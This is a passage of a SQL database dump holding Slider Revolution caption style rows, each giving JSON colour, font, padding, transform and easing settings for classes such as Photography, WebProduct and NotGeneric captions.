origin_y\":\"50\",\"pers\":\"600\"}'),(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"Power3.easeInOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Back.easeOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 